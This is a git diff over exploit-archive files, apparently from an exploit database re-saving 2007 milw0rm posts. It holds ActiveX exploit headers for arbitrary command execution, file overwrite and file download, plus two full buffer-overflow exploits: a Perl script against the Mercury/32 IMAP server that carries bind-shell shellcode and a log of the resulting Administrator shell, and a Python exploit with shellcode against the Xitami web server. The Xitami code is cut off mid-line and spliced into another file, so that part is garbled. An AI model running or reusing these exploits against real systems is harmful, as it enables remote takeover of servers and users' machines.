@@ -1,37 +1,37 @@
-
-
-
-# milw0rm.com [2007-09-07]
+
+
+
+# milw0rm.com [2007-09-07]
diff --git a/platforms/windows/remote/4388.html b/platforms/windows/remote/4388.html
index b1de3b896..0583e4239 100755
--- a/platforms/windows/remote/4388.html
+++ b/platforms/windows/remote/4388.html
@@ -1,37 +1,37 @@
-
    --------------------------------------------------------------------------------------
- Ultra Crypto Component (CryptoX.dll <= 2.0) "SaveToFile()" Inscure Method
- url: http://www.ultrashareware.com/
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
- 
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
- all software that use this ocx are vulnerable to this exploits.
-
- We can use the "HexString()" method to save into our batch file some lines.
- In this PoC, I convert "cmd.exe /c notepad.exe" in hexadecimal format, then
- I save it in a batch file :)
--------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-09-10]
+
    +-------------------------------------------------------------------------------------
+ Ultra Crypto Component (CryptoX.dll <= 2.0) "SaveToFile()" Inscure Method
+ url: http://www.ultrashareware.com/
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+ 
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+ all software that use this ocx are vulnerable to this exploits.
+
+ We can use the "HexString()" method to save into our batch file some lines.
+ In this PoC, I convert "cmd.exe /c notepad.exe" in hexadecimal format, then
+ I save it in a batch file :)
+-------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-09-10]
diff --git a/platforms/windows/remote/4389.html b/platforms/windows/remote/4389.html
index 56ee8e9f1..07cbf7002 100755
--- a/platforms/windows/remote/4389.html
+++ b/platforms/windows/remote/4389.html
@@ -1,81 +1,81 @@
-
    ------------------------------------------------------------------------------------
- Ultra Crypto Component (CryptoX.dll <= 2.0) "AcquireContext()" Remote BoF Exploit
- url: http://www.ultrashareware.com/
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
- 
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
- all software that use this ocx are vulnerable to this exploits.
-
- Heap Spray Technique was developed by SkyLined
- (http://www.edup.tudelft.nl/~bjwever/advisory_iframe.html.php)
-
- The "DeleteContext()" is vulnerable too
------------------------------------------------------------------------------------
-
-
-
-
-
    
-
-# milw0rm.com [2007-09-10]
+
    +-----------------------------------------------------------------------------------
+ Ultra Crypto Component (CryptoX.dll <= 2.0) "AcquireContext()" Remote BoF Exploit
+ url: http://www.ultrashareware.com/
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+ 
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+ all software that use this ocx are vulnerable to this exploits.
+
+ Heap Spray Technique was developed by SkyLined
+ (http://www.edup.tudelft.nl/~bjwever/advisory_iframe.html.php)
+
+ The "DeleteContext()" is vulnerable too
+-----------------------------------------------------------------------------------
+
+
+
+
+
    
+
+# milw0rm.com [2007-09-10]
diff --git a/platforms/windows/remote/439.c b/platforms/windows/remote/439.c
index 3af8cdb14..b93f7d22d 100755
--- a/platforms/windows/remote/439.c
+++ b/platforms/windows/remote/439.c
@@ -241,6 +241,6 @@ WSACleanup();
 
 return 0;
 }
-
-
-// milw0rm.com [2004-09-12]
+
+
+// milw0rm.com [2004-09-12]
diff --git a/platforms/windows/remote/4393.html b/platforms/windows/remote/4393.html
index a97b35446..c38e5c060 100755
--- a/platforms/windows/remote/4393.html
+++ b/platforms/windows/remote/4393.html
@@ -1,45 +1,45 @@
-
    -------------------------------------------------------------------------------------------------------
- Microsoft Visual Studio 6.0 PDWizard (PDWizard.ocx <= 6.0.0.9782) Remote Arbitrary Command Execution
- url: http://www.microsoft.com
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
- 
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-
- greetz to: Wiz001 (be safe brotha... and see soon :D)
-
- Description:
- This ocx contains a lot of extreme dangerous methods. Theese two are very interesting, they are:
- "StartProcess()" and "SyncShell()"
- Using one of them, you'll be able to run every program you like, simply giving to the method the 
- right argument.
- In this PoC, I use the "StartProcess()" method to execute the calc.exe, but you can do everything
- you like.
- Anyway, I think you could imagine what impact could have this kind of vulnerability :D
-
- Other dangerous methods of this ocx are:
- "SaveAs()"
- "CABDefaultURL()"
- "CABFileName()"
- "CABRunFile()"
-------------------------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-09-11]
+
    +------------------------------------------------------------------------------------------------------
+ Microsoft Visual Studio 6.0 PDWizard (PDWizard.ocx <= 6.0.0.9782) Remote Arbitrary Command Execution
+ url: http://www.microsoft.com
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+ 
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+
+ greetz to: Wiz001 (be safe brotha... and see soon :D)
+
+ Description:
+ This ocx contains a lot of extreme dangerous methods. Theese two are very interesting, they are:
+ "StartProcess()" and "SyncShell()"
+ Using one of them, you'll be able to run every program you like, simply giving to the method the 
+ right argument.
+ In this PoC, I use the "StartProcess()" method to execute the calc.exe, but you can do everything
+ you like.
+ Anyway, I think you could imagine what impact could have this kind of vulnerability :D
+
+ Other dangerous methods of this ocx are:
+ "SaveAs()"
+ "CABDefaultURL()"
+ "CABFileName()"
+ "CABRunFile()"
+------------------------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-09-11]
diff --git a/platforms/windows/remote/4394.html b/platforms/windows/remote/4394.html
index e74f68c8d..bb3bec2d9 100755
--- a/platforms/windows/remote/4394.html
+++ b/platforms/windows/remote/4394.html
@@ -1,37 +1,37 @@
-
    ----------------------------------------------------------------------------------------------------------
- Microsoft Visual Studio 6.0 VB To VSI Support Library (VBTOVSI.DLL v. 1.0.0.0) Arbitrary File Overwrite
- url: http://www.microsoft.com
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
- 
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-
- Description:
- Using the "Load()" method we can load the content of a file from local machine passed as argument to
- this function and then save it into arbitrary location with the "SaveAs()" method.
- This allow to overwrite well known files with arbitrary data. I try to pass to the "Load()" method
- remote directories (http) but, unfortunately, it accepts only local directories.
----------------------------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-09-11]
+
    +---------------------------------------------------------------------------------------------------------
+ Microsoft Visual Studio 6.0 VB To VSI Support Library (VBTOVSI.DLL v. 1.0.0.0) Arbitrary File Overwrite
+ url: http://www.microsoft.com
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+ 
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+
+ Description:
+ Using the "Load()" method we can load the content of a file from local machine passed as argument to
+ this function and then save it into arbitrary location with the "SaveAs()" method.
+ This allow to overwrite well known files with arbitrary data. I try to pass to the "Load()" method
+ remote directories (http) but, unfortunately, it accepts only local directories.
+---------------------------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-09-11]
diff --git a/platforms/windows/remote/4398.html b/platforms/windows/remote/4398.html
index b807a2adc..c40c532aa 100755
--- a/platforms/windows/remote/4398.html
+++ b/platforms/windows/remote/4398.html
@@ -1,53 +1,53 @@
-
-
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2007-09-12]
+
+
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2007-09-12]
diff --git a/platforms/windows/remote/4420.html b/platforms/windows/remote/4420.html
index b3605d601..86ba1f28b 100755
--- a/platforms/windows/remote/4420.html
+++ b/platforms/windows/remote/4420.html
@@ -1,56 +1,56 @@
-
    ------------------------------------------------------------------------------
- MW6 Technologies QRCode ActiveX 3.0 (MW6QRCode.dll) Remote File Overwrite
- url: www.mw6tech.com
-
- Author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-
- Description:
- This control contains two methods, "SaveAsBMP()" and "SaveAsWMF()", which
- write to a file specified as an argument.
- These can be exploited to overwrite and corrupt arbitrary files on the
- system in the context of the currently logged-on user.
-
- Marked as:
- RegKey Safe for Script: False
- RegKey Safe for Init: False
- Implements IObjectSafety: True
- IDisp Safe: Safe for untrusted: caller,data
- IPersist Safe: Safe for untrusted: caller,data
- IPStorage Safe: Safe for untrusted: caller,data
- KillBitSet: Falso 
------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-09-18]
+
    +-----------------------------------------------------------------------------
+ MW6 Technologies QRCode ActiveX 3.0 (MW6QRCode.dll) Remote File Overwrite
+ url: www.mw6tech.com
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+
+ Description:
+ This control contains two methods, "SaveAsBMP()" and "SaveAsWMF()", which
+ write to a file specified as an argument.
+ These can be exploited to overwrite and corrupt arbitrary files on the
+ system in the context of the currently logged-on user.
+
+ Marked as:
+ RegKey Safe for Script: False
+ RegKey Safe for Init: False
+ Implements IObjectSafety: True
+ IDisp Safe: Safe for untrusted: caller,data
+ IPersist Safe: Safe for untrusted: caller,data
+ IPStorage Safe: Safe for untrusted: caller,data
+ KillBitSet: Falso 
+-----------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-09-18]
diff --git a/platforms/windows/remote/4427.html b/platforms/windows/remote/4427.html
index eb300b271..a6b014d77 100755
--- a/platforms/windows/remote/4427.html
+++ b/platforms/windows/remote/4427.html
@@ -1,29 +1,29 @@
-
-
-
-
-
-
-
-
-# milw0rm.com [2007-09-19]
+
+
+
+
+
+
+
+
+# milw0rm.com [2007-09-19]
diff --git a/platforms/windows/remote/4428.html b/platforms/windows/remote/4428.html
index 5046dbf24..8e7fdf83c 100755
--- a/platforms/windows/remote/4428.html
+++ b/platforms/windows/remote/4428.html
@@ -1,44 +1,44 @@
-
    ------------------------------------------------------------------------------
- Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download
- url: http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe
-
- Author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-
- Marked as:
- RegKey Safe for Script: False
- RegkeySafe for Init: False
- KillBitSet: False
-
- From remote: depends by Internet Explorer settings
- From local: yes
-
- Description:
- This contron contains a "GetFile()" method which allows to download, on
- user's pc, an arbitrary file pased as argument.
- Remote execution depends by Internet Explorer settings, local execution
- works very well.
-
- greetz to: skyhole (or YAG KOHHA) for inspiration
------------------------------------------------------------------------------
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-09-19]
+
    +-----------------------------------------------------------------------------
+ Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download
+ url: http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+
+ Marked as:
+ RegKey Safe for Script: False
+ RegkeySafe for Init: False
+ KillBitSet: False
+
+ From remote: depends by Internet Explorer settings
+ From local: yes
+
+ Description:
+ This contron contains a "GetFile()" method which allows to download, on
+ user's pc, an arbitrary file pased as argument.
+ Remote execution depends by Internet Explorer settings, local execution
+ works very well.
+
+ greetz to: skyhole (or YAG KOHHA) for inspiration
+-----------------------------------------------------------------------------
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-09-19]
diff --git a/platforms/windows/remote/4429.pl b/platforms/windows/remote/4429.pl
index fad68fed3..3ad4c11b1 100755
--- a/platforms/windows/remote/4429.pl
+++ b/platforms/windows/remote/4429.pl
@@ -1,132 +1,132 @@
-# Z:\Exp>mercury_SEARCH.pl 127.0.0.1 143 void ph4nt0m.org
-#    Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit
-#                                          Found & Code by void# ph4nt0m.org
-# 
-# S: * OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready.
-# C: pst06 LOGIN void ph4nt0m.org
-# S: pst06 OK LOGIN completed.
-# C: pst06 SELECT INBOX
-# S: * 0 EXISTS
-# S: * 0 RECENT
-# S: * FLAGS (\Deleted \Draft \Seen \Answered)
-# S: * OK [UIDVALIDITY 1190225819] UID Validity
-# S: * OK [UIDNEXT 1] Predicted next UID
-# S: * OK [PERMANENTFLAGS (\Deleted \Draft \Seen \Answered)] Settable message flag
-# s
-# S: pst06 OK [READ-WRITE] SELECT completed.
-# [*] Send Evil Payload ...
-# [+] Done! Check out cmdshell@127.0.0.1:31337. Good Luck  :-P 
-# 
-# Z:\Exp>nc -vv 127.0.0.1 31337
-# DNS fwd/rev mismatch: localhost != GNU
-# localhost [127.0.0.1] 31337 (?) open
-# Microsoft Windows XP [°æ±¾ 5.1.2600]
-# (C) °æȨËùÓÐ 1985-2001 Microsoft Corp.
-# 
-# e:\MERCURY>whoami
-# whoami
-# Administrator
-# 
-# e:\MERCURY>
-
-use strict;
-use warnings;
-use IO::Socket;
-
-# Target IP
-my $imap_host = shift || 127.0.0.1;
-my $imap_port = shift || 143;
-my $imap_user = shift || "void";
-my $imap_pass = shift || "ph4nt0m.org";
-
-my $banner = 
-"   Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit\n".
-"                                         Found & Code by void#ph4nt0m.org\n".
-"\n";
-
-my $cheers = "Celebrate_the_6th_anniversary_of_the_founding_of_Ph4nt0m.org";
-my $jmpesp = "\x12\x45\xfa\x7f"; # Windows 2000/xp/2003 CHS Universe
-
-# /* win32_bind -  EXITFUNC=thread LPORT=31337 Size=347 Encoder=Pex http://metasploit.com */
-# bad char: 0x00 0x0A 0x0D 0x20 0x29 
-my $shellcode =
-"\x31\xc9\x81\xe9\xb0\xff\xff\xff\xe8\xff\xff\xff\xff\xc0\x5e\x81".
-"\x76\x0e\xfa\xd1\xa5\x6f\x83\xee\xfc\xe2\xf4\x06\xbb\x4e\x22\x12".
-"\x28\x5a\x90\x05\xb1\x2e\x03\xde\xf5\x2e\x2a\xc6\x5a\xd9\x6a\x82".
-"\xd0\x4a\xe4\xb5\xc9\x2e\x30\xda\xd0\x4e\x26\x71\xe5\x2e\x6e\x14".
-"\xe0\x65\xf6\x56\x55\x65\x1b\xfd\x10\x6f\x62\xfb\x13\x4e\x9b\xc1".
-"\x85\x81\x47\x8f\x34\x2e\x30\xde\xd0\x4e\x09\x71\xdd\xee\xe4\xa5".
-"\xcd\xa4\x84\xf9\xfd\x2e\xe6\x96\xf5\xb9\x0e\x39\xe0\x7e\x0b\x71".
-"\x92\x95\xe4\xba\xdd\x2e\x1f\xe6\x7c\x2e\x2f\xf2\x8f\xcd\xe1\xb4".
-"\xdf\x49\x3f\x05\x07\xc3\x3c\x9c\xb9\x96\x5d\x92\xa6\xd6\x5d\xa5".
-"\x85\x5a\xbf\x92\x1a\x48\x93\xc1\x81\x5a\xb9\xa5\x58\x40\x09\x7b".
-"\x3c\xad\x6d\xaf\xbb\xa7\x90\x2a\xb9\x7c\x66\x0f\x7c\xf2\x90\x2c".
-"\x82\xf6\x3c\xa9\x82\xe6\x3c\xb9\x82\x5a\xbf\x9c\xb9\xdf\x06\x9c".
-"\x82\x2c\x8e\x6f\xb9\x01\x75\x8a\x16\xf2\x90\x2c\xbb\xb5\x3e\xaf".
-"\x2e\x75\x07\x5e\x7c\x8b\x86\xad\x2e\x73\x3c\xaf\x2e\x75\x07\x1f".
-"\x98\x23\x26\xad\x2e\x73\x3f\xae\x85\xf0\x90\x2a\x42\xcd\x88\x83".
-"\x17\xdc\x38\x05\x07\xf0\x90\x2a\xb7\xcf\x0b\x9c\xb9\xc6\x02\x73".
-"\x34\xcf\x3f\xa3\xf8\x69\xe6\x1d\xbb\xe1\xe6\x18\xe0\x65\x9c\x50".
-"\x2f\xe7\x42\x04\x93\x89\xfc\x77\xab\x9d\xc4\x51\x7a\xcd\x1d\x04".
-"\x62\xb3\x90\x8f\x95\x5a\xb9\xa1\x86\xf7\x3e\xab\x80\xcf\x6e\xab".
-"\x80\xf0\x3e\x05\x01\xcd\xc2\x23\xd4\x6b\x3c\x05\x07\xcf\x90\x05".
-"\xe6\x5a\xbf\x71\x86\x59\xec\x3e\xb5\x5a\xb9\xa8\x2e\x75\x07\x15".
-"\x1f\x45\x0f\xa9\x2e\x73\x90\x2a\xd1\xa5\x6f";
-
-
-
-print $banner;
-sleep(1);
-
-my $sock = IO::Socket::INET->new( PeerHost=>$imap_host, PeerPort=>$imap_port, proto=>"tcp" ) or die "Connect error.\n";
-imap_recv("");
-
-imap_send("pst06 LOGIN $imap_user $imap_pass\r\n", "rv");
-imap_send("pst06 SELECT INBOX\r\n", "rv");
-
-my $payload = $cheers.$jmpesp.$shellcode;
-print "[*] Send Evil Payload ...\n";
-imap_send("pst06 SEARCH ON $payload\r\n", "");
-sleep(1);
-print "[+] Done! Check out cmdshell\@$imap_host:31337. Good Luck :-P\n";
-$sock->close();
-
-
-sub imap_send
-{
-	if($_[1] =~ /v/)
-	{
-		if(length($_[0])<=75)
-		{
-			print "C: ".$_[0];
-		}
-		else
-		{
-			print "C: ".substr($_[0], 0, 36)." ... ".substr($_[0], -36, -1)."\n";
-		}
-	}
-
-	print $sock $_[0];
-
-	if($_[1] =~ /r/)
-	{	
-		imap_recv(substr($_[0], 0, index($_[0], " ")+1));
-	}
-}
-
-
-sub imap_recv
-{
-	while(<$sock>)
-	{
-		print "S: ".$_;
-		if($_ =~ /$_[0]OK/)
-		{	last;	}
-		elsif($_ =~ /$_[0]NO|$_[0]BAD/ )
-		{	last;	}
-		else
-		{	next;	}
-	}
-}
-
-# milw0rm.com [2007-09-19]
+# Z:\Exp>mercury_SEARCH.pl 127.0.0.1 143 void ph4nt0m.org
+#    Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit
+#                                          Found & Code by void# ph4nt0m.org
+# 
+# S: * OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready.
+# C: pst06 LOGIN void ph4nt0m.org
+# S: pst06 OK LOGIN completed.
+# C: pst06 SELECT INBOX
+# S: * 0 EXISTS
+# S: * 0 RECENT
+# S: * FLAGS (\Deleted \Draft \Seen \Answered)
+# S: * OK [UIDVALIDITY 1190225819] UID Validity
+# S: * OK [UIDNEXT 1] Predicted next UID
+# S: * OK [PERMANENTFLAGS (\Deleted \Draft \Seen \Answered)] Settable message flag
+# s
+# S: pst06 OK [READ-WRITE] SELECT completed.
+# [*] Send Evil Payload ...
+# [+] Done! Check out cmdshell@127.0.0.1:31337. Good Luck  :-P 
+# 
+# Z:\Exp>nc -vv 127.0.0.1 31337
+# DNS fwd/rev mismatch: localhost != GNU
+# localhost [127.0.0.1] 31337 (?) open
+# Microsoft Windows XP [°æ±¾ 5.1.2600]
+# (C) °æȨËùÓÐ 1985-2001 Microsoft Corp.
+# 
+# e:\MERCURY>whoami
+# whoami
+# Administrator
+# 
+# e:\MERCURY>
+
+use strict;
+use warnings;
+use IO::Socket;
+
+# Target IP
+my $imap_host = shift || 127.0.0.1;
+my $imap_port = shift || 143;
+my $imap_user = shift || "void";
+my $imap_pass = shift || "ph4nt0m.org";
+
+my $banner = 
+"   Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit\n".
+"                                         Found & Code by void#ph4nt0m.org\n".
+"\n";
+
+my $cheers = "Celebrate_the_6th_anniversary_of_the_founding_of_Ph4nt0m.org";
+my $jmpesp = "\x12\x45\xfa\x7f"; # Windows 2000/xp/2003 CHS Universe
+
+# /* win32_bind -  EXITFUNC=thread LPORT=31337 Size=347 Encoder=Pex http://metasploit.com */
+# bad char: 0x00 0x0A 0x0D 0x20 0x29 
+my $shellcode =
+"\x31\xc9\x81\xe9\xb0\xff\xff\xff\xe8\xff\xff\xff\xff\xc0\x5e\x81".
+"\x76\x0e\xfa\xd1\xa5\x6f\x83\xee\xfc\xe2\xf4\x06\xbb\x4e\x22\x12".
+"\x28\x5a\x90\x05\xb1\x2e\x03\xde\xf5\x2e\x2a\xc6\x5a\xd9\x6a\x82".
+"\xd0\x4a\xe4\xb5\xc9\x2e\x30\xda\xd0\x4e\x26\x71\xe5\x2e\x6e\x14".
+"\xe0\x65\xf6\x56\x55\x65\x1b\xfd\x10\x6f\x62\xfb\x13\x4e\x9b\xc1".
+"\x85\x81\x47\x8f\x34\x2e\x30\xde\xd0\x4e\x09\x71\xdd\xee\xe4\xa5".
+"\xcd\xa4\x84\xf9\xfd\x2e\xe6\x96\xf5\xb9\x0e\x39\xe0\x7e\x0b\x71".
+"\x92\x95\xe4\xba\xdd\x2e\x1f\xe6\x7c\x2e\x2f\xf2\x8f\xcd\xe1\xb4".
+"\xdf\x49\x3f\x05\x07\xc3\x3c\x9c\xb9\x96\x5d\x92\xa6\xd6\x5d\xa5".
+"\x85\x5a\xbf\x92\x1a\x48\x93\xc1\x81\x5a\xb9\xa5\x58\x40\x09\x7b".
+"\x3c\xad\x6d\xaf\xbb\xa7\x90\x2a\xb9\x7c\x66\x0f\x7c\xf2\x90\x2c".
+"\x82\xf6\x3c\xa9\x82\xe6\x3c\xb9\x82\x5a\xbf\x9c\xb9\xdf\x06\x9c".
+"\x82\x2c\x8e\x6f\xb9\x01\x75\x8a\x16\xf2\x90\x2c\xbb\xb5\x3e\xaf".
+"\x2e\x75\x07\x5e\x7c\x8b\x86\xad\x2e\x73\x3c\xaf\x2e\x75\x07\x1f".
+"\x98\x23\x26\xad\x2e\x73\x3f\xae\x85\xf0\x90\x2a\x42\xcd\x88\x83".
+"\x17\xdc\x38\x05\x07\xf0\x90\x2a\xb7\xcf\x0b\x9c\xb9\xc6\x02\x73".
+"\x34\xcf\x3f\xa3\xf8\x69\xe6\x1d\xbb\xe1\xe6\x18\xe0\x65\x9c\x50".
+"\x2f\xe7\x42\x04\x93\x89\xfc\x77\xab\x9d\xc4\x51\x7a\xcd\x1d\x04".
+"\x62\xb3\x90\x8f\x95\x5a\xb9\xa1\x86\xf7\x3e\xab\x80\xcf\x6e\xab".
+"\x80\xf0\x3e\x05\x01\xcd\xc2\x23\xd4\x6b\x3c\x05\x07\xcf\x90\x05".
+"\xe6\x5a\xbf\x71\x86\x59\xec\x3e\xb5\x5a\xb9\xa8\x2e\x75\x07\x15".
+"\x1f\x45\x0f\xa9\x2e\x73\x90\x2a\xd1\xa5\x6f";
+
+
+
+print $banner;
+sleep(1);
+
+my $sock = IO::Socket::INET->new( PeerHost=>$imap_host, PeerPort=>$imap_port, proto=>"tcp" ) or die "Connect error.\n";
+imap_recv("");
+
+imap_send("pst06 LOGIN $imap_user $imap_pass\r\n", "rv");
+imap_send("pst06 SELECT INBOX\r\n", "rv");
+
+my $payload = $cheers.$jmpesp.$shellcode;
+print "[*] Send Evil Payload ...\n";
+imap_send("pst06 SEARCH ON $payload\r\n", "");
+sleep(1);
+print "[+] Done! Check out cmdshell\@$imap_host:31337. Good Luck :-P\n";
+$sock->close();
+
+
+sub imap_send
+{
+	if($_[1] =~ /v/)
+	{
+		if(length($_[0])<=75)
+		{
+			print "C: ".$_[0];
+		}
+		else
+		{
+			print "C: ".substr($_[0], 0, 36)." ... ".substr($_[0], -36, -1)."\n";
+		}
+	}
+
+	print $sock $_[0];
+
+	if($_[1] =~ /r/)
+	{	
+		imap_recv(substr($_[0], 0, index($_[0], " ")+1));
+	}
+}
+
+
+sub imap_recv
+{
+	while(<$sock>)
+	{
+		print "S: ".$_;
+		if($_ =~ /$_[0]OK/)
+		{	last;	}
+		elsif($_ =~ /$_[0]NO|$_[0]BAD/ )
+		{	last;	}
+		else
+		{	next;	}
+	}
+}
+
+# milw0rm.com [2007-09-19]
diff --git a/platforms/windows/remote/4445.html b/platforms/windows/remote/4445.html
index c2a35329d..2c3c3142e 100755
--- a/platforms/windows/remote/4445.html
+++ b/platforms/windows/remote/4445.html
@@ -1,46 +1,46 @@
-
-
-pwnin'...
-
-
-
-
-
-# milw0rm.com [2007-09-23]
+
+
+pwnin'...
+
+
+
+
+
+# milw0rm.com [2007-09-23]
diff --git a/platforms/windows/remote/4450.py b/platforms/windows/remote/4450.py
index 229959a80..45a74e901 100755
--- a/platforms/windows/remote/4450.py
+++ b/platforms/windows/remote/4450.py
@@ -1,64 +1,64 @@
-#!/usr/bin/python
-# Xitami Web Server 2.5 (If-Modified-Since) 0day Remote Buffer Overflow Exploit
-# Bug discovered by Krystian Kloskowski (h07) 
-# Tested on: Xitami 2.5c2 / XP SP2 Polish
-# Shellcode: Windows Execute Command (calc) 
-# Details:..
-#
-#     [Module xigui32.exe]
-#     If-Modified-Since: Evil, ["A" * 76]\r\n
-#     EIP 41414141
-#
-#     [Module xitami.exe]
-#     If-Modified-Since: Evil, ["A" * 104]\r\n
-#     EIP 41414141
-#
-# Product Homepage: http://www.xitami.com/
-# Just for fun  ;) 
-##
-
-from struct import pack
-from time import sleep
-from socket import *
-
-host = "192.168.0.1"
-port = 80
-
-shellcode = (
-"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
-"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
-"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"
-"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"
-"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"
-"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"
-"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70"
-"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33"
-"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04"
-"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2")
-
-opcode = pack("
+# Tested on: Xitami 2.5c2 / XP SP2 Polish
+# Shellcode: Windows Execute Command (calc) 
+# Details:..
+#
+#     [Module xigui32.exe]
+#     If-Modified-Since: Evil, ["A" * 76]\r\n
+#     EIP 41414141
+#
+#     [Module xitami.exe]
+#     If-Modified-Since: Evil, ["A" * 104]\r\n
+#     EIP 41414141
+#
+# Product Homepage: http://www.xitami.com/
+# Just for fun  ;) 
+##
+
+from struct import pack
+from time import sleep
+from socket import *
+
+host = "192.168.0.1"
+port = 80
+
+shellcode = (
+"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
+"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
+"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"
+"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"
+"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"
+"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"
+"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70"
+"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33"
+"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04"
+"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2")
+
+opcode = pack("
-
-
-
-
-
-# milw0rm.com [2007-09-24]
+
+
+
+
+
+
+# milw0rm.com [2007-09-24]
diff --git a/platforms/windows/remote/4455.pl b/platforms/windows/remote/4455.pl
index 24a7eee48..16b5c8b92 100755
--- a/platforms/windows/remote/4455.pl
